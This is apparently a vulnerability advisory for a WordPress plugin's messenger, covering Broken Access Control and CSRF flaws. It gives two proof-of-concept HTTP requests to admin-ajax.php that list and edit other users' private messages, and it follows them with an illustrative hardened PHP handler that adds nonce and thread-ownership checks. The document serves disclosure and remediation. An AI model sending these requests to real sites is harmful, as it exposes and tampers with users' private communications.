The plugin was affected by Broken Access Control and Cross-Site Request Forgery (CSRF) vulnerabilities.
The plugin provides a frontend user profile, groups, communities and a messenger. The messenger is vulnerable because its AJAX handlers do not authenticate the requesting user or check who owns the requested thread, so any caller can list and modify other users' messages.
Proof of Concept
To list other users’ messages:
```http
POST /vdb/metagauss-profilegrid/wp-admin/admin-ajax.php HTTP/1.1
Host: lana.solutions
Content-Type: application/x-www-form-urlencoded

action=pm_messenger_show_messages&tid=1
```
To edit another user’s message:
```http
POST /vdb/metagauss-profilegrid/wp-admin/admin-ajax.php HTTP/1.1
Host: lana.solutions
Content-Type: application/x-www-form-urlencoded

action=pm_messenger_send_new_message&tid=1&rid=-&mid=1&content=message1%20from%20user1%20to%20user2%20(edited%20by%20spy)&_wpnonce=b5faed947c
```
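Both requests above succeed because the handlers behind the `pm_messenger_show_messages` and `pm_messenger_send_new_message` actions neither verify a per-user nonce nor confirm that the caller belongs to thread `tid` or wrote message `mid`. The following hardened handlers are an added example written for this page, not the plugin's own code; the table names `pm_thread_members` and `pm_messages`, their columns, the nonce action `pm_messenger_nonce` and the helper `pm_secure_user_in_thread` are all hypothetical, while the WordPress functions used (`add_action`, `check_ajax_referer`, `get_current_user_id`, `absint`, `sanitize_textarea_field`, `wp_send_json_error`, `wp_send_json_success`, `$wpdb->prepare`) are real core APIs.

```php
<?php
// Hardened messenger AJAX handlers (illustrative example, not the plugin's code).
// Table and column names are hypothetical.

// Register for logged-in users only. Without a matching wp_ajax_nopriv_ hook,
// WordPress rejects unauthenticated calls before the callback ever runs.
add_action( 'wp_ajax_pm_messenger_show_messages',   'pm_secure_show_messages' );
add_action( 'wp_ajax_pm_messenger_send_new_message', 'pm_secure_send_new_message' );

// Ownership check: true only if $user_id is a member of thread $tid.
// Assumes a hypothetical {prefix}pm_thread_members(thread_id, user_id) table.
function pm_secure_user_in_thread( $user_id, $tid ) {
    global $wpdb;
    $count = $wpdb->get_var( $wpdb->prepare(
        "SELECT COUNT(*) FROM {$wpdb->prefix}pm_thread_members WHERE thread_id = %d AND user_id = %d",
        $tid, $user_id
    ) );
    return (int) $count > 0;
}

function pm_secure_show_messages() {
    // CSRF defence: the nonce must have been issued to this user for this action.
    // check_ajax_referer() dies with a 403 response on mismatch.
    check_ajax_referer( 'pm_messenger_nonce', '_wpnonce' );

    $user_id = get_current_user_id();
    $tid     = isset( $_POST['tid'] ) ? absint( $_POST['tid'] ) : 0;

    // Access-control defence: a valid thread id is not enough, the caller must belong to it.
    if ( ! $tid || ! pm_secure_user_in_thread( $user_id, $tid ) ) {
        wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
    }

    global $wpdb;
    $rows = $wpdb->get_results( $wpdb->prepare(
        "SELECT id, sender_id, content, created_at FROM {$wpdb->prefix}pm_messages WHERE thread_id = %d ORDER BY created_at ASC",
        $tid
    ) );
    wp_send_json_success( $rows );
}

function pm_secure_send_new_message() {
    check_ajax_referer( 'pm_messenger_nonce', '_wpnonce' );

    $user_id = get_current_user_id();
    $tid     = isset( $_POST['tid'] ) ? absint( $_POST['tid'] ) : 0;
    $mid     = isset( $_POST['mid'] ) ? absint( $_POST['mid'] ) : 0;
    $content = isset( $_POST['content'] ) ? sanitize_textarea_field( wp_unslash( $_POST['content'] ) ) : '';

    if ( ! $tid || '' === $content || ! pm_secure_user_in_thread( $user_id, $tid ) ) {
        wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
    }

    global $wpdb;
    $table = $wpdb->prefix . 'pm_messages';

    if ( $mid ) {
        // Editing: the message must exist in this thread AND have been sent by the caller.
        // The sender is matched against the session, never against a request parameter.
        $owned = $wpdb->get_var( $wpdb->prepare(
            "SELECT COUNT(*) FROM {$table} WHERE id = %d AND thread_id = %d AND sender_id = %d",
            $mid, $tid, $user_id
        ) );
        if ( (int) $owned === 0 ) {
            wp_send_json_error( array( 'message' => 'Not your message' ), 403 );
        }
        $wpdb->update( $table, array( 'content' => $content ), array( 'id' => $mid ), array( '%s' ), array( '%d' ) );
        wp_send_json_success( array( 'id' => $mid ) );
    }

    // New message: sender_id comes from the authenticated session.
    $wpdb->insert(
        $table,
        array( 'thread_id' => $tid, 'sender_id' => $user_id, 'content' => $content, 'created_at' => current_time( 'mysql' ) ),
        array( '%d', '%d', '%s', '%s' )
    );
    wp_send_json_success( array( 'id' => $wpdb->insert_id ) );
}
```

The frontend must receive a nonce created with `wp_create_nonce( 'pm_messenger_nonce' )` (typically passed to the script via `wp_localize_script`) and send it as `_wpnonce`; because WordPress nonces are bound to the current user and session, the static `_wpnonce` value in the PoC request would no longer be accepted for another user. Note that the nonce alone does not fix the Broken Access Control issue: the `pm_secure_user_in_thread` and `sender_id` checks are what stop a logged-in user from reading or editing messages in threads they do not belong to.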